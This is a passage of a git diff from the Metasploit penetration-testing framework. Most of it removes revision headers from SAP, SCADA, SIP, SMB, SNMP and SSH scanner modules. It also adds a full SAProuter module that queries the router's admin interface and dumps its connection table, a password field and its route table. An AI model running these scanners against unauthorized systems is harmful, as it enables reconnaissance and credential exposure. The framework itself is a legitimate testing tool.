instance properties through the SAP Management Console SOAP Interface. @@ -50,11 +45,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res @@ -213,7 +204,6 @@ class Metasploit4 < Msf::Auxiliary :data => {:proto => "soap", :igsurl => igsurl}) end if dbstring - dbstring = CGI.unescapeHTML(dbstring) print_good("#{rhost}:#{rport} [SAP] ABAP DATABASE: #{dbstring}") report_note(:host => rhost, :proto => 'tcp', @@ -223,7 +213,6 @@ class Metasploit4 < Msf::Auxiliary :update => :unique_data ) end if j2eedbstring - j2eedbstring = CGI.unescapeHTML(j2eedbstring) print_good("#{rhost}:#{rport} [SAP] J2EE DATABASE: #{j2eedbstring}") report_note(:host => rhost, :proto => 'tcp', @@ -234,10 +223,8 @@ class Metasploit4 < Msf::Auxiliary end if protectedweb protectedweb_arr = protectedweb.split(",") - print_good("#{rhost}:#{rport} [SAP] Protected Webmethods (auth required) :") - protectedweb_arr.each do | pweb | - print_status("#{pweb}") - end + print_good("#{rhost}:#{rport} [SAP] Protected Webmethods (auth required) :::") + print_status("#{protectedweb}") report_note(:host => rhost, :proto => 'tcp', :port => rport, @@ -246,12 +233,14 @@ class Metasploit4 < Msf::Auxiliary :update => :unique_data ) end if webmethods + webmethods_output = [] # create empty webmethods array webmethods_arr = webmethods.split(",") - print_good("#{rhost}:#{rport} [SAP] Unprotected Webmethods :") + print_good("#{rhost}:#{rport} [SAP] Unprotected Webmethods :::") webmethods_arr.each do | webm | - # Only print webmethods not found in protectedweb_arr - print_status("#{webm}") if not protectedweb_arr.include?(webm) + # Only add webmethods not found in protectedweb_arr + webmethods_output << webm if not protectedweb_arr.include?(webm) end + print_status("#{webmethods_output.join(',')}") if webmethods_output report_note(:host => rhost, :proto => 'tcp', :port => rport, @@ -259,7 +248,6 @@ class Metasploit4 < Msf::Auxiliary :data => {:proto => "soap", :webmethods => webmethods}, :update => :unique_data ) end - return elsif fault print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}") diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index b94bbdffd7..8a9d437fe5 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console List Logfiles', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to output a list of available logfiles and developer tracefiles through the SAP Management @@ -39,7 +34,7 @@ class Metasploit4 < Msf::Auxiliary [ Opt::RPORT(50013), OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), - OptString.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE']), + OptEnum.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE', ['TRACEFILE','LOGFILE']]) ], self.class) register_autofilter_ports([ 50013 ]) deregister_options('RHOST') @@ -52,11 +47,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 6b81f6c5fc..b33efab603 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console getStartProfile', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to acces the SAP startup profile through the SAP Management Console SOAP Interface. @@ -50,10 +45,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index 37d33dc83c..775034b114 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Version Detection', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to identify the version of SAP through the SAP Management Console SOAP Interface. @@ -50,10 +45,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb new file mode 100644 index 0000000000..af2c9c6500 --- /dev/null +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -0,0 +1,158 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'SAPRouter Admin Request', + 'Description' => %q{ + Display the remote connection table from a SAPRouter. + }, + 'References' => [ + [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ], + [ 'URL', 'http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm'], + [ 'URL', 'http://www.onapsis.com/research-free-solutions.php' ] # Bizsploit Opensource ERP Pentesting Framework + ], + 'Author' => [ + 'nomnkee', + 'Mariano Nunez', # Wrote Bizploit, helped on this module, very cool guy + 'Chris John Riley', # Testing + 'Ian de Villiers', # Testing + 'Joris van de Vis' # Testing + ], + 'License' => BSD_LICENSE + ) + register_options( + [ + Opt::RPORT(3299) + ], self.class) + end + + def get_data(size, packet_len) + info = '' + 1.upto(size) do |i| + data = sock.recv(1) + packet_len -= 1 + if data == "\x00" + sock.recv(size - i) + packet_len -= size - i + return info, packet_len + break + else + info << data + end + end + end + + def run_host(ip) + host_port = "#{ip}:#{datastore['RPORT']}" + type = 'ROUTER_ADM' + version = 0x26 + cmd = 0x2 + count = 0 + connected = true + port = datastore['RPORT'] + source = '' + destination = '' + service = '' + ni_packet = type + [0,version,cmd,0,0].pack("c*") + ni_packet = [ni_packet.length].pack('N') << ni_packet + saptbl = Msf::Ui::Console::Table.new( + Msf::Ui::Console::Table::Style::Default, + 'Header' => "[SAP] SAProuter Connection Table for #{ip}", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' => + [ + "Source", + "Destination", + "Service" + ]) + begin + connect + rescue ::Rex::ConnectionRefused + print_status("#{host_port} - Connection refused") + connected = false + rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error + print_status("#{host_port} - Connection timeout") + connected = false + rescue ::Exception => e + print_error("#{host_port} - Exception #{e.class} #{e} #{e.backtrace}") + connected = false + end + if connected + print_good("#{host_port} - Connected to saprouter") + print_good("#{host_port} - Sending ROUTER_ADM packet info request") + sock.put(ni_packet) + packet_len = sock.read(4).unpack('H*')[0].to_i 16 + print_good("#{host_port} - Got INFO response") + while packet_len !=0 + count += 1 + case count + when 1 + if packet_len > 150 + sock.recv(150) + packet_len -= 150 + source, packet_len = get_data(46,packet_len) + destination, packet_len = get_data(46,packet_len) + service, packet_len = get_data(30,packet_len) + sock.recv(2) + packet_len -= 2 + saptbl << [source, destination, service] + while packet_len > 0 + sock.recv(13) + packet_len -= 13 + source, packet_len = get_data(46,packet_len) + destination, packet_len = get_data(46,packet_len) + service, packet_len = get_data(30,packet_len) + term = sock.recv(2) + packet_len -= 2 + saptbl << [source, destination, service] + end + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + else + print_error("#{host_port} - No connected clients") + sock.recv(packet_len) + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + end + when 2 + data = sock.recv(packet_len) + packet_len -= packet_len + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + when 3 + clients = sock.recv(packet_len) + packet_len -= packet_len + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + when 4 + pwd = sock.recv(packet_len) + print_good(pwd) + packet_len -= packet_len + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + when 5 + routtab = sock.recv(packet_len) + print_good(routtab) + packet_len -= packet_len + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + end + if packet_len == 0 + break + end + end + disconnect + # TODO: This data should be saved somewhere. A note on the host would be nice. + print(saptbl.to_s) + end + end +end diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index d41b17fb0b..41bead609f 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Digi ADDP Remote Reboot Initiator', - 'Version' => '$Revision$', 'Description' => 'Reboot Digi International based equipment through the ADDP service', 'Author' => 'hdm', 'References' => diff --git a/modules/auxiliary/scanner/scada/digi_addp_version.rb b/modules/auxiliary/scanner/scada/digi_addp_version.rb index 83687167c4..07944f3b46 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_version.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Digi ADDP Information Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover host information through the Digi International ADDP service', 'Author' => 'hdm', 'References' => diff --git a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb index d713af29e5..e6d6f4e7b8 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/scada/digi_realport_version.rb b/modules/auxiliary/scanner/scada/digi_realport_version.rb index 9860efe614..3d03b2ebb3 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_version.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb index 1cda561fe9..7a990a3411 100644 --- a/modules/auxiliary/scanner/scada/koyo_login.rb +++ b/modules/auxiliary/scanner/scada/koyo_login.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Koyo DirectLogic PLC Password Brute Force Utility', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to authenticate to a locked Koyo DirectLogic PLC. The PLC uses a restrictive passcode, which can be A0000000 through A9999999. diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index 610f9fc359..9c472c374e 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Username Enumerator (UDP)', - 'Version' => '$Revision$', 'Description' => 'Scan for numeric username/extensions using OPTIONS/REGISTER requests', 'Author' => 'et', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 7a7d8df0f6..ef5a6d53b9 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Username Enumerator (TCP)', - 'Version' => '$Revision$', 'Description' => 'Scan for numeric username/extensions using OPTIONS/REGISTER requests', 'Author' => 'et', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 977121dd4a..a81df328b2 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Endpoint Scanner (UDP)', - 'Version' => '$Revision$', 'Description' => 'Scan for SIP devices using OPTIONS requests', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index d505f561c8..07765fe8fa 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Endpoint Scanner (TCP)', - 'Version' => '$Revision$', 'Description' => 'Scan for SIP devices using OPTIONS requests', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb index eea9e98784..35578201a7 100644 --- a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb +++ b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary (other versions may be affected). }, 'Author' => 'Anibal Aguiar ', - 'Version' => '$Revision$', 'References' => [ ['BID', '47710'], diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 0fe359de19..560acd4cbc 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Session Pipe Auditor', - 'Version' => '$Revision$', 'Description' => 'Determine what named pipes are accessible over SMB', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index f0b5260920..cdb1b4f495 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Session Pipe DCERPC Auditor', - 'Version' => '$Revision$', 'Description' => 'Determine what DCERPC services are accessible over a SMB pipe', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index 77a7cc21a8..b3138b8d75 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB 2.0 Protocol Detection', - 'Version' => '$Revision$', 'Description' => 'Detect systems that support the SMB 2.0 protocol', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index cdfbeb419a..1e29ff153e 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Share Enumeration', - 'Version' => '$Revision$', 'Description' => 'Determine what shares are provided by the SMB service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index 520e2deb99..f63fe57a1f 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB User Enumeration (SAM EnumUsers)', - 'Version' => '$Revision$', 'Description' => 'Determine what local users exist via the SAM RPC service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index 0582b2626e..dc6124a9c1 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision $', 'Description' => 'Determine what domain users are logged into a remote system via a DCERPC to NetWkstaUserEnum.', 'Author' => 'natron', - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa370669%28VS.85%29.aspx' ] diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 2168e91585..8ffe83a4bb 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Local User Enumeration (LookupSid)', - 'Version' => '$Revision$', 'Description' => 'Determine what local users exist via brute force SID lookups', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index fbb770395d..13bf28c281 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Version Detection', - 'Version' => '$Revision$', 'Description' => 'Display version information about each system', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 2766795f0a..f8ca9137e9 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMTP User Enumeration Utility', - 'Version' => '$Revision$', 'Description' => %q{ The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index a44bd07643..70f5a7cde9 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMTP Banner Grabber', - 'Version' => '$Revision$', 'Description' => 'SMTP Banner Grabber', 'References' => [ diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index 2933987069..8319b87a01 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'AIX SNMP Scanner Auxiliary Module', - 'Version' => '$Revision$', 'Description' => 'AIX SNMP Scanner Auxiliary Module', 'Author' => [ diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 5570362b2c..b565f7b995 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Cisco IOS SNMP Configuration Grabber (TFTP)', - 'Version' => '$Revision$', 'Description' => %q{ This module will download the startup or running configuration from a Cisco IOS device using SNMP and TFTP. A read-write SNMP diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index 631b1f2cd9..c9bb1716bf 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Cisco IOS SNMP File Upload (TFTP)', - 'Version' => '$Revision$', 'Description' => %q{ This module will copy file to a Cisco IOS device using SNMP and TFTP. A read-write SNMP community is required. The SNMP community scanner module can diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index ec10c11ecd..7db3f6190d 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'SNMP Enumeration Module', - 'Version' => '$Revision$', 'Description' => 'This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is "public".', diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 183710d530..1fe6a610e8 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SNMP Windows SMB Share Enumeration', - 'Version' => '$Revision$', 'Description' => "This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP", 'Author' => ['tebo[at]attackresearch.com'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 0ce4d6caf8..1d1c38fa14 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SNMP Windows Username Enumeration', - 'Version' => '$Revision$', 'Description' => "This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP", 'Author' => ['tebo[at]attackresearch.com'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index b3982fb559..84cbc9f4c0 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SNMP Community Scanner', - 'Version' => '$Revision$', 'Description' => 'Scan for SNMP devices using common community names', 'Author' => 'hdm', 'References' => diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index 7ba24efd46..668e0264cf 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'SNMP Set Module', - 'Version' => '$Revision$', 'Description' => %q{ This module, similar to snmpset tool, uses the SNMP SET request to set information on a network entity. A OID (numeric notation) diff --git a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb index ab1779dc63..d2c1eb71af 100644 --- a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Xerox WorkCentre User Enumeration (SNMP)', - 'Version' => '$Revision$', 'Description' => %q{ This module will do user enumeration based on the Xerox WorkCentre present on the network. SNMP is used to extract the usernames. diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index 1d163d716f..b65aeeb166 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SSH Login Check Scanner', - 'Version' => 